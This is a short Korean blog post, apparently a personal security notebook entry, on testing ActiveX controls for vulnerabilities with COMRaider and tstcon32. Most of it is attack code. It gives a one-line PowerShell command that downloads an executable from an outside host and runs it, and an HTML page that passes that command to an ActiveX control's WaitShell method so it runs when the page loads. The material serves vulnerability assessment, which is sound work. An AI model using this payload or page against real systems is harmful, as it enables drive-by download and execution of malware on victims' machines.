-
Active X 취약점 점검Hack/No filtered 2022. 2. 3. 12:55
COMRaider 사용
visual C++ 6.0 / tstcon32.exe 사용powershell 을 이용한 파일 다운로드 & 파일 실행 한줄 명령어
cmd.exe /c powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.0.5/dashboard/Client.exe','C:\\abc.exe') & C:\\abc.exe
함수 사용 예시
<html>
<head>
<title>MyActiveX webpage</title>
</head>
<body>
<OBJECT id="myActiveX" classid="clsid:00000000-0000-0000-0000-000000000000"></OBJECT>
<script type="text/javascript">
try {
var obj = document.myActiveX;
if (obj) {
obj.WaitShell("cmd.exe /c powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.0.5/dashboard/Client.exe','C:\\abc.exe') & C:\\abc.exe","0");
} else {
alert("Object is not created!");
}
} catch (ex) {
alert("Some error happens, error message is: " + ex.Description);
}
</script>
</body>
</html>반응형'Hack > No filtered' 카테고리의 다른 글
USIM 정보 해킹 사건 관련하여 (0) 2025.04.29 linux 열린 포트 서비스 데몬 확인 명령어 (0) 2022.02.03 iOS 취약점 진단 (메모리 덤프, 파일 비교) (0) 2022.02.03 windbg crash dump exploitable (0) 2022.01.27 [Android] Bluetooth Snoop HCI log (0) 2021.04.01